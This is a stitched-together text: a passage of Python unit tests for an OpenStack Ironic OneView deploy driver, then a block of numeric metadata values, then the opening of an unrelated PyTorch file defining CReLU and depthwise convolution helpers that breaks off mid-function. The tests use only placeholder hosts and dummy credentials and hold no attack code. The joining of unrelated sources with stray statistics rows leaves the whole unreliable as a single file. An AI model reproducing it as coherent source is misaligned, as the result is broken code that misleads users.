self.deploy._periodic_check_nodes_taken_on_cleanfail(
self.manager, self.context
)
self.assertTrue(self.manager.update_node.called)
self.assertTrue(self.manager.do_provisioning_action.called)
self.assertTrue(self.node.maintenance)
self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
self.node.maintenance_reason)
self.assertFalse('oneview_error' in self.node.driver_internal_info)
def test_node_stay_clean_failed_when_no_oneview_error(
self, mock_is_node_in_use_by_oneview, mock_node_get
):
mock_node_get.get.return_value = self.node
_setup_node_in_cleanfailed_state_without_oneview_error(self.node)
self.manager.iter_nodes.return_value = nodes_taken_on_cleanfail_no_info
self.deploy._periodic_check_nodes_taken_on_cleanfail(
self.manager, self.context
)
self.assertFalse(self.manager.update_node.called)
self.assertFalse(self.manager.do_provisioning_action.called)
self.assertFalse(self.node.maintenance)
self.assertNotEqual(common.NODE_IN_USE_BY_ONEVIEW,
self.node.maintenance_reason)
self.assertFalse('oneview_error' in self.node.driver_internal_info)
@mock.patch.object(common, 'get_oneview_client', spec_set=True, autospec=True)
class TestOneViewAgentDeploy(db_base.DbTestCase):
def setUp(self):
super(TestOneViewAgentDeploy, self).setUp()
self.config(
post_deploy_get_power_state_retries=GET_POWER_STATE_RETRIES,
group='agent')
mgr_utils.mock_the_extension_manager(driver="agent_pxe_oneview")
self.driver = driver_factory.get_driver("agent_pxe_oneview")
self.node = obj_utils.create_test_node(
self.context, driver='agent_pxe_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=db_utils.get_test_oneview_driver_info(),
driver_internal_info={'agent_url': 'http://1.2.3.4:5678'},
)
@mock.patch.object(time, 'sleep', lambda seconds: None)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(power.OneViewPower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch('ironic.conductor.utils.node_set_boot_device', autospec=True)
def test_reboot_and_finish_deploy(self, set_bootdev_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
mock_get_ov_client):
self.node.provision_state = states.DEPLOYING
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.side_effect = [states.POWER_ON,
states.POWER_OFF]
task.driver.deploy.reboot_and_finish_deploy(task)
power_off_mock.assert_called_once_with(task.node)
self.assertEqual(2, get_power_state_mock.call_count)
set_bootdev_mock.assert_called_once_with(task, 'disk',
persistent=True)
node_power_action_mock.assert_called_once_with(
task, states.POWER_ON)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(time, 'sleep', lambda seconds: None)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(power.OneViewPower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
def test_reboot_and_finish_deploy_soft_poweroff_doesnt_complete(
self, power_off_mock, get_power_state_mock,
node_power_action_mock, mock_get_ov_client):
oneview_client = mock_get_ov_client.return_value
self.driver.management.oneview_client = oneview_client
fake_server_hardware = oneview_models.ServerHardware()
fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
oneview_client.get_server_hardware_by_uuid.return_value = (
fake_server_hardware
)
mock_get_ov_client.return_value = oneview_client
self.node.provision_state = states.DEPLOYING
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
self.node.driver_info = driver_info
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_ON
task.driver.deploy.reboot_and_finish_deploy(task)
power_off_mock.assert_called_once_with(task.node)
self.assertEqual(GET_POWER_STATE_RETRIES + 1,
get_power_state_mock.call_count)
node_power_action_mock.assert_has_calls([
mock.call(task, states.POWER_OFF),
mock.call(task, states.POWER_ON)
])
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
def test_reboot_and_finish_deploy_soft_poweroff_fails(
self, power_off_mock, node_power_action_mock,
mock_get_ov_client):
oneview_client = mock_get_ov_client.return_value
self.driver.management.oneview_client = oneview_client
fake_server_hardware = oneview_models.ServerHardware()
fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
oneview_client.get_server_hardware_by_uuid.return_value = (
fake_server_hardware
)
mock_get_ov_client.return_value = oneview_client
power_off_mock.side_effect = RuntimeError("boom")
self.node.provision_state = states.DEPLOYING
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
self.node.driver_info = driver_info
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.reboot_and_finish_deploy(task)
power_off_mock.assert_called_once_with(task.node)
node_power_action_mock.assert_has_calls([
mock.call(task, states.POWER_OFF),
mock.call(task, states.POWER_ON)
])
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(time, 'sleep', lambda seconds: None)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(power.OneViewPower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
def test_reboot_and_finish_deploy_get_power_state_fails(
self, power_off_mock, get_power_state_mock,
node_power_action_mock, mock_get_ov_client):
oneview_client = mock_get_ov_client.return_value
self.driver.management.oneview_client = oneview_client
fake_server_hardware = oneview_models.ServerHardware()
fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
oneview_client.get_server_hardware_by_uuid.return_value = (
fake_server_hardware
)
mock_get_ov_client.return_value = oneview_client
self.node.provision_state = states.DEPLOYING
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
self.node.driver_info = driver_info
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.side_effect = RuntimeError("boom")
task.driver.deploy.reboot_and_finish_deploy(task)
power_off_mock.assert_called_once_with(task.node)
self.assertEqual(GET_POWER_STATE_RETRIES + 1,
get_power_state_mock.call_count)
node_power_action_mock.assert_has_calls([
mock.call(task, states.POWER_OFF),
mock.call(task, states.POWER_ON)
])
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(driver_utils, 'collect_ramdisk_logs', autospec=True)
@mock.patch.object(time, 'sleep', lambda seconds: None)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(power.OneViewPower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
def test_reboot_and_finish_deploy_power_action_fails(
self, power_off_mock, get_power_state_mock,
node_power_action_mock, collect_ramdisk_logs_mock,
mock_get_ov_client):
self.node.provision_state = states.DEPLOYING
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_ON
node_power_action_mock.side_effect = RuntimeError("boom")
self.assertRaises(exception.InstanceDeployFailure,
task.driver.deploy.reboot_and_finish_deploy,
task)
power_off_mock.assert_called_once_with(task.node)
self.assertEqual(GET_POWER_STATE_RETRIES + 1,
get_power_state_mock.call_count)
node_power_action_mock.assert_has_calls([
mock.call(task, states.POWER_OFF),
mock.call(task, states.POWER_OFF)])
self.assertEqual(states.DEPLOYFAIL, task.node.provision_state)
self.assertEqual(states.ACTIVE, task.node.target_provision_state)
collect_ramdisk_logs_mock.assert_called_once_with(task.node)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(power.OneViewPower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch('ironic.drivers.modules.agent.AgentDeploy'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance(self, clean_pxe_mock, check_deploy_mock,
power_off_mock, get_power_state_mock,
node_power_action_mock, mock_get_ov_client):
check_deploy_mock.return_value = None
oneview_client = mock_get_ov_client.return_value
self.driver.management.oneview_client = oneview_client
fake_server_hardware = oneview_models.ServerHardware()
fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
oneview_client.get_server_hardware_by_uuid.return_value = (
fake_server_hardware
)
mock_get_ov_client.return_value = oneview_client
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
self.node.driver_info = driver_info
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.deploy.reboot_to_instance(task)
clean_pxe_mock.assert_called_once_with(task.driver.boot, task)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.POWER_ON)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(power.OneViewPower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch('ironic.drivers.modules.agent.AgentDeploy'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_none(self, clean_pxe_mock,
check_deploy_mock,
power_off_mock,
get_power_state_mock,
node_power_action_mock,
mock_get_ov_client):
oneview_client = mock_get_ov_client.return_value
self.driver.management.oneview_client = oneview_client
fake_server_hardware = oneview_models.ServerHardware()
fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
oneview_client.get_server_hardware_by_uuid.return_value = (
fake_server_hardware
)
mock_get_ov_client.return_value = oneview_client
check_deploy_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
self.node.driver_info = driver_info
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
task.driver.deploy.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.POWER_ON)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(common, 'get_oneview_client', spec_set=True, autospec=True)
class OneViewIscsiDeployTestCase(db_base.DbTestCase):
def setUp(self):
super(OneViewIscsiDeployTestCase, self).setUp()
self.config(manager_url='https://1.2.3.4', group='oneview')
self.config(username='user', group='oneview')
self.config(password='password', group='oneview')
mgr_utils.mock_the_extension_manager(driver='iscsi_pxe_oneview')
self.driver = driver_factory.get_driver('iscsi_pxe_oneview')
OV_DRV_INFO_DICT = db_utils.get_test_oneview_driver_info()
OV_DRV_INFO_DICT.update(PXE_DRV_INFO_DICT)
self.node = obj_utils.create_test_node(
self.context, driver='iscsi_pxe_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=OV_DRV_INFO_DICT,
instance_info=PXE_INST_INFO_DICT,
)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
self.info = common.get_oneview_info(self.node)
def test_get_properties(self, mock_get_ov_client):
expected = common.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.deploy.get_properties())
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'validate',
spec_set=True, autospec=True)
def test_validate(self, iscsi_deploy_validate_mock, mock_get_ov_client):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.validate(task)
iscsi_deploy_validate_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare',
spec_set=True, autospec=True)
def test_prepare(self, iscsi_deploy_prepare_mock, mock_get_ov_client):
self.node.provision_state = states.DEPLOYING
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
iscsi_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare',
spec_set=True, autospec=True)
def test_prepare_active_node(self, iscsi_deploy_prepare_mock,
mock_get_ov_client):
"""Ensure nodes in running states are not inadvertently changed"""
test_states = list(states.STABLE_STATES)
test_states.extend([states.CLEANING,
states.CLEANWAIT,
states.INSPECTING])
for state in test_states:
self.node.provision_state = state
self.node.save()
iscsi_deploy_prepare_mock.reset_mock()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
iscsi_deploy_prepare_mock.assert_called_once_with(
mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
def test_prepare_with_dynamic_allocation_enabled(
self, allocate_server_hardware_mock,
iscsi_deploy_prepare_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.provision_state = states.DEPLOYING
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
iscsi_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(allocate_server_hardware_mock.called)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'deploy',
spec_set=True, autospec=True)
def test_deploy(self, iscsi_deploy_mock, mock_get_ov_client):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.deploy(task)
iscsi_deploy_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down', spec_set=True,
autospec=True)
def test_tear_down(self, iscsi_tear_down_mock, mock_get_ov_client):
iscsi_tear_down_mock.return_value = states.DELETED
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
returned_state = task.driver.deploy.tear_down(task)
iscsi_tear_down_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(states.DELETED, returned_state)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down', spec_set=True,
autospec=True)
@mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
def test_tear_down_with_dynamic_allocation_enabled(
self, deallocate_server_hardware_mock,
iscsi_tear_down_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
CONF.conductor.automated_clean = False
iscsi_tear_down_mock.return_value = states.DELETED
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
returned_state = task.driver.deploy.tear_down(task)
iscsi_tear_down_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(states.DELETED, returned_state)
self.assertTrue(deallocate_server_hardware_mock.called)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare_cleaning',
spec_set=True, autospec=True)
def test_prepare_cleaning(self, iscsi_prep_clean_mock, mock_get_ov_client):
iscsi_prep_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ret = task.driver.deploy.prepare_cleaning(task)
self.assertEqual(states.CLEANWAIT, ret)
iscsi_prep_clean_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare_cleaning',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
def test_prepare_cleaning_with_dynamic_allocation_enabled(
self, allocate_server_hardware_mock,
iscsi_prep_clean_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
iscsi_prep_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ret = task.driver.deploy.prepare_cleaning(task)
self.assertEqual(states.CLEANWAIT, ret)
iscsi_prep_clean_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(allocate_server_hardware_mock.called)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down_cleaning',
spec_set=True, autospec=True)
def test_tear_down_cleaning(self, iscsi_tear_down_clean_mock,
mock_get_ov_client):
iscsi_tear_down_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.tear_down_cleaning(task)
iscsi_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down_cleaning',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
def test_tear_down_cleaning_with_dynamic_allocation_enabled(
self, deallocate_server_hardware_mock,
iscsi_tear_down_clean_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
iscsi_tear_down_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.tear_down_cleaning(task)
iscsi_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(deallocate_server_hardware_mock.called)
@mock.patch.object(common, 'get_oneview_client', spec_set=True, autospec=True)
class OneViewAgentDeployTestCase(db_base.DbTestCase):
def setUp(self):
super(OneViewAgentDeployTestCase, self).setUp()
self.config(manager_url='https://1.2.3.4', group='oneview')
self.config(username='user', group='oneview')
self.config(password='password', group='oneview')
mgr_utils.mock_the_extension_manager(driver='agent_pxe_oneview')
self.driver = driver_factory.get_driver('agent_pxe_oneview')
OV_DRV_INFO_DICT = db_utils.get_test_oneview_driver_info()
OV_DRV_INFO_DICT.update(PXE_DRV_INFO_DICT)
self.node = obj_utils.create_test_node(
self.context, driver='agent_pxe_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=OV_DRV_INFO_DICT,
instance_info=PXE_INST_INFO_DICT,
)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
self.info = common.get_oneview_info(self.node)
def test_get_properties(self, mock_get_ov_client):
expected = common.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.deploy.get_properties())
@mock.patch.object(agent.AgentDeploy, 'validate',
spec_set=True, autospec=True)
def test_validate(self, agent_deploy_validate_mock, mock_get_ov_client):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.validate(task)
agent_deploy_validate_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(agent.AgentDeploy, 'prepare',
spec_set=True, autospec=True)
def test_prepare(self, agent_deploy_prepare_mock, mock_get_ov_client):
self.node.provision_state = states.DEPLOYING
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
agent_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(agent.AgentDeploy, 'prepare',
spec_set=True, autospec=True)
def test_prepare_active_node(self, agent_deploy_prepare_mock,
mock_get_ov_client):
"""Ensure nodes in running states are not inadvertently changed"""
test_states = list(states.STABLE_STATES)
test_states.extend([states.CLEANING,
states.CLEANWAIT,
states.INSPECTING])
for state in test_states:
self.node.provision_state = state
self.node.save()
agent_deploy_prepare_mock.reset_mock()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
agent_deploy_prepare_mock.assert_called_once_with(
mock.ANY, task)
@mock.patch.object(agent.AgentDeploy, 'prepare',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
def test_prepare_with_dynamic_allocation_enabled(
self, allocate_server_hardware_mock,
agent_deploy_prepare_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.provision_state = states.DEPLOYING
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
agent_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(allocate_server_hardware_mock.called)
@mock.patch.object(agent.AgentDeploy, 'deploy',
spec_set=True, autospec=True)
def test_deploy(self, agent_deploy_mock, mock_get_ov_client):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.deploy(task)
agent_deploy_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(agent.AgentDeploy, 'tear_down', spec_set=True,
autospec=True)
def test_tear_down(self, agent_tear_down_mock, mock_get_ov_client):
agent_tear_down_mock.return_value = states.DELETED
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
returned_state = task.driver.deploy.tear_down(task)
agent_tear_down_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(states.DELETED, returned_state)
@mock.patch.object(agent.AgentDeploy, 'tear_down', spec_set=True,
autospec=True)
@mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
def test_tear_down_with_dynamic_allocation_enabled(
self, deallocate_server_hardware_mock,
agent_tear_down_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
CONF.conductor.automated_clean = False
agent_tear_down_mock.return_value = states.DELETED
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
returned_state = task.driver.deploy.tear_down(task)
agent_tear_down_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(states.DELETED, returned_state)
self.assertTrue(deallocate_server_hardware_mock.called)
@mock.patch.object(agent.AgentDeploy, 'prepare_cleaning',
spec_set=True, autospec=True)
def test_prepare_cleaning(self, agent_prep_clean_mock, mock_get_ov_client):
agent_prep_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ret = task.driver.deploy.prepare_cleaning(task)
self.assertEqual(states.CLEANWAIT, ret)
agent_prep_clean_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(agent.AgentDeploy, 'prepare_cleaning',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
def test_prepare_cleaning_with_dynamic_allocation_enabled(
self, allocate_server_hardware_mock,
agent_prep_clean_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
agent_prep_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ret = task.driver.deploy.prepare_cleaning(task)
self.assertEqual(states.CLEANWAIT, ret)
agent_prep_clean_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(allocate_server_hardware_mock.called)
@mock.patch.object(agent.AgentDeploy, 'tear_down_cleaning',
spec_set=True, autospec=True)
def test_tear_down_cleaning(self, agent_tear_down_clean_mock,
mock_get_ov_client):
agent_tear_down_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.tear_down_cleaning(task)
agent_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(agent.AgentDeploy, 'tear_down_cleaning',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
def test_tear_down_cleaning_with_dynamic_allocation_enabled(
self, deallocate_server_hardware_mock,
agent_tear_down_clean_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
agent_tear_down_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.tear_down_cleaning(task)
agent_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(deallocate_server_hardware_mock.called)
| 47.501618
| 79
| 0.683563
| 5,430
| 44,034
| 5.160037
| 0.052118
| 0.040829
| 0.032656
| 0.032121
| 0.918413
| 0.907099
| 0.88697
| 0.864342
| 0.848139
| 0.841893
| 0
| 0.001221
| 0.237271
| 44,034
| 926
| 80
| 47.552916
| 0.833026
| 0.018281
| 0
| 0.778195
| 0
| 0
| 0.051037
| 0.015068
| 0
| 0
| 0
| 0
| 0.151629
| 1
| 0.06015
| false
| 0.003759
| 0.030075
| 0
| 0.097744
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba8d17b113a045f52f47aebeeb44caccf3102dd
| 81
|
py
|
Python
|
devops-console/apps/pipelines/views.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 4
|
2019-12-06T06:19:33.000Z
|
2021-12-23T13:05:06.000Z
|
devops-console/apps/pipelines/views.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 8
|
2020-03-15T03:40:38.000Z
|
2022-03-12T00:50:27.000Z
|
devops-console/apps/pipelines/views.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import viewsets
from rest_framework.response import Response
| 27
| 44
| 0.888889
| 11
| 81
| 6.363636
| 0.545455
| 0.228571
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 45
| 40.5
| 0.958904
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dbd0b75cc3fa040909911a05eaa10e5db16e1d9f
| 26,653
|
py
|
Python
|
models.py
|
dipikakhullar/ocr
|
a55e70d82f42803be5ed63f8f59e4fa597fcf8d6
|
[
"MIT"
] | 284
|
2018-10-17T12:13:54.000Z
|
2022-03-31T07:36:31.000Z
|
models.py
|
dipikakhullar/ocr
|
a55e70d82f42803be5ed63f8f59e4fa597fcf8d6
|
[
"MIT"
] | 72
|
2018-10-29T08:45:47.000Z
|
2021-12-16T15:15:24.000Z
|
models.py
|
dipikakhullar/ocr
|
a55e70d82f42803be5ed63f8f59e4fa597fcf8d6
|
[
"MIT"
] | 86
|
2018-10-26T14:11:08.000Z
|
2022-03-26T13:44:10.000Z
|
'''
Created on Sep 3, 2017
@author: Michal.Busta at gmail.com
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from torch.nn import LeakyReLU, Conv2d, Dropout2d, LogSoftmax, InstanceNorm2d
import math
class CReLU(nn.Module):
def __init__(self):
super(CReLU, self).__init__()
def forward(self, x):
return torch.cat((F.leaky_relu(x, 0.01, inplace=True), F.leaky_relu(-x, 0.01, inplace=True)), 1)
class CReLU_IN(nn.Module):
def __init__(self, channels):
super(CReLU_IN, self).__init__()
self.bn = nn.InstanceNorm2d(channels * 2, eps=1e-05, momentum=0.1, affine=True)
def forward(self, x):
cat = torch.cat((x, -x), 1)
x = self.bn(cat)
return F.leaky_relu(x, 0.01, inplace=True)
def conv_bn(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True)
)
def conv_dw(inp, oup, stride, dilation=1):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1 + (dilation > 0) * (dilation -1), dilation=dilation, groups=inp, bias=False),
nn.BatchNorm2d(inp),
nn.LeakyReLU(inplace=True, negative_slope=0.01),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
nn.LeakyReLU(inplace=True, negative_slope=0.01),
)
def conv_dw_plain(inp, oup, stride, dilation=1):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1 + (dilation > 0) * (dilation -1), dilation=dilation, groups=inp, bias=False),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False)
)
def conv_dw_res(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
nn.BatchNorm2d(inp),
nn.LeakyReLU(inplace=True, negative_slope=0.01),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
)
def conv_dw_in(inp, oup, stride, dilation=1):
return nn.Sequential(
